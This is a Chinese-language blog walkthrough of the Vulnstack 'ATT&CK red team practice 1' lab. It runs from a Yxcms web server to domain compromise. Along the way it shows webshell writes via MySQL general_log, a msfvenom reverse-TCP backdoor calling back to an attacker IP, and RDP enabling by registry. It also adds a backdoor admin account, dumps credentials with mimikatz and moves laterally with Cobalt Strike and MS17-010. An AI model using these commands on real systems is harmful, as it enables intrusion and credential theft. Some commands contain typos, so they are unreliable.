ATT&CK实战系列——红队实战(一)

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

拓扑结构大体如下:
ATT&CK实战系列——红队实战(一)_第1张图片

靶机下载地址:https://pan.baidu.com/share/init?surl=nC6V8e_EuKfaLb2IuEbe7w
提取码:n1u2
开机密码:hongrisec@2019

因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。

Windows7(内配有phpstudy web环境):
ATT&CK实战系列——红队实战(一)_第2张图片
域内主机Win2K3 Metasploitable:
ATT&CK实战系列——红队实战(一)_第3张图片

域控Windows 2008:
ATT&CK实战系列——红队实战(一)_第4张图片
外网初探

web服务器win7的模拟外网ip(192.168.72.129),打开页面后发现是一个Yxcms的站点
直接上御剑先扫一波康康有没有可疑的信息~
ATT&CK实战系列——红队实战(一)_第5张图片
发现有很多目录,打开发现这个cms存在目录遍历漏洞:
ATT&CK实战系列——红队实战(一)_第6张图片
我们在右侧公告栏发现敏感信息泄露:后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,这样我们直接进入后台康康能不能getshell。
ATT&CK实战系列——红队实战(一)_第7张图片
ATT&CK实战系列——红队实战(一)_第8张图片
然后我们投机取巧谷歌大法搜一搜康康这个cms有没有漏洞,搜索后发现YXcms 1.4.7 存在任意文件写入
ATT&CK实战系列——红队实战(一)_第9张图片
ATT&CK实战系列——红队实战(一)_第10张图片
ATT&CK实战系列——红队实战(一)_第11张图片
直接在这里写入一句话php木马
ATT&CK实战系列——红队实战(一)_第12张图片然后我们根据之前目录遍历漏洞找到flag.php
ATT&CK实战系列——红队实战(一)_第13张图片
ATT&CK实战系列——红队实战(一)_第14张图片
命令执行是一个管理员权限,到这里可以直接用shell连接工具就行,然后还有一个方法是通过phpMyAdmin,默认的用户名,密码:root
在这里插入图片描述
ATT&CK实战系列——红队实战(一)_第15张图片

phpmyadmin后台getshell的几种方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

执行以下sql语句
show variables like ‘%secure%’;
ATT&CK实战系列——红队实战(一)_第16张图片
发现没有写入权限,无法用select into outfile方法直接写入shell。再来看一下第二种方法,利用开启全局日志general_log去getshell,show variables like ‘%general%’;查看日志状态
ATT&CK实战系列——红队实战(一)_第17张图片
当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。
1.SET GLOBAL general_log=‘on’; 开启日志
2.set global general_log_file=‘C:/phpstudy/www/yxcms/shell.php’;# 设置日志位置为网站目录
3.将一句话木马写入shell.php文件中 SELECT ''
ATT&CK实战系列——红队实战(一)_第18张图片
ATT&CK实战系列——红队实战(一)_第19张图片
然后使用蚁剑连接

杀入内网
ATT&CK实战系列——红队实战(一)_第20张图片
发现我们刚刚拿到的shell是一个administrator权限的shell,这样我们就不用提权什么的了

查看3389是否开启(远程桌面的服务端口)
ATT&CK实战系列——红队实战(一)_第21张图片
发现3389并没有开启,我们使用以下命令开启它:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述
尝试直接远程桌面连接却失败了,可能是防火墙的原因
ATT&CK实战系列——红队实战(一)_第22张图片
这时候我的思路就是制作一个msf的后门上传上去运行,然后反弹一个msf的shell回来,尝试关闭防火墙
在这里插入图片描述
生成一个后门文件test.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=6666 -f exe -o test.exe
ATT&CK实战系列——红队实战(一)_第23张图片
msf大法

msfconsole (运行msfconsole)
msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号
输入命令show payloads会显示出有效的攻击载荷

ATT&CK实战系列——红队实战(一)_第24张图片
然后上传test.exe并运行它
ATT&CK实战系列——红队实战(一)_第25张图片
ATT&CK实战系列——红队实战(一)_第26张图片
成功上线

getsystem //自动尝试提权
getuid //当前会话用户身份
run post/windows/manage/enable_rdp //关闭防火墙

ATT&CK实战系列——红队实战(一)_第27张图片
关闭掉防火墙后,添加用户尝试远程连接上去

添加用户 net user test asd123ASD! /add #添加一个用户
        net localgroup administrators test /add #将用户添加到管理员组
        #登陆只能选择STU1域 #STU1/

ATT&CK实战系列——红队实战(一)_第28张图片
为了方便后面的内网渗透,所以上传一个CS的shell并且反弹

Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。

钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。

主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 作为一款协同APT工具,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选。

使用的大致流程是:创建团队服务器->客户端连接团队服务器->创建监听器->生成payload对应监听器->靶机运行后门上线->后渗透

运行cs需要先有Java环境

ATT&CK实战系列——红队实战(一)_第29张图片
生成cs shell并运行
在这里插入图片描述
ATT&CK实战系列——红队实战(一)_第30张图片
hashdump
ATT&CK实战系列——红队实战(一)_第31张图片

mimitakz获取到administrator(域管理员)的明文密码
ATT&CK实战系列——红队实战(一)_第32张图片
接下来我们信息收集,对域中的其他主机进行内网渗透。
ATT&CK实战系列——红队实战(一)_第33张图片
在这里插入图片描述

Ladon 192.168.52.0/24 OnlinePC # 多协议探测存活主机(IP、机器名、MAC地址、制造商)
Ladon 192.168.52.0/24 OsScan #多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
192.168.52.138 域控Windows 2008
192.168.52.141 域内主机Win2K3 Metasploitable

横向移动

横向渗透概念:
横向渗透攻击技术是复杂网络攻击中广泛使用的一种技术,特别是在高级持续威胁(Advanced Persistent Threats,APT)中更加热衷于使用这种攻击方法。攻击者可以利用这些技术,以被攻陷的系统为跳板,访问其他主机,获取包括邮箱、共享文件夹或者凭证信息在内的敏感资源。攻击者可以利用这些敏感信息,进一步控制其他系统、提升权限或窃取更多有价值的凭证。借助此类攻击,攻击者最终可能获取域控的访问权限,完全控制基于Windows系统的基础设施或与业务相关的关键账户。
在提权后,我们可以用mimikatz dump目标机的凭证,并进行内网横向移动

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
ATT&CK实战系列——红队实战(一)_第34张图片
psexec横向移动
ATT&CK实战系列——红队实战(一)_第35张图片
ATT&CK实战系列——红队实战(一)_第36张图片
ATT&CK实战系列——红队实战(一)_第37张图片
ATT&CK实战系列——红队实战(一)_第38张图片

窃取token
在进程列表中,寻找以域管理员身份运行的进程,并选定进行steal token,如果成功,则会返回域管权限的beacon
ATT&CK实战系列——红队实战(一)_第39张图片
这里窃取token 然后psexec横向移动域内主机Win2K3,ip为192.168.52.141,这是一种思路,由于失败然后我们用msf进行渗透

我们先添加一下路由

run autoroute -s 192.168.52.0/24
run autoroute -p

ATT&CK实战系列——红队实战(一)_第40张图片
探测是否存在ms17_010

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
run

ATT&CK实战系列——红队实战(一)_第41张图片
存在漏洞,但是实际攻击失败了

选择下面的模块
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.52.141
set payload windows/meterpreter/bind_tcp

ATT&CK实战系列——红队实战(一)_第42张图片
拿到系统权限

开启2003远程桌面
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set COMMAND REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\* \*Server /v fDenyTSConnections /t REG_DWIRD /d 00000000 /f

ATT&CK实战系列——红队实战(一)_第43张图片
ATT&CK实战系列——红队实战(一)_第44张图片
远程登陆Win2K3 Metasploitable成功
小白渗透不喜勿喷~

学大佬的方法 网址如下
https://www.bilibili.com/read/cv6476215/
https://www.sohu.com/a/382017102_100014967
http://www.secwk.com/2019/11/05/13705/

你可能感兴趣的:(渗透测试,安全漏洞,渗透测试)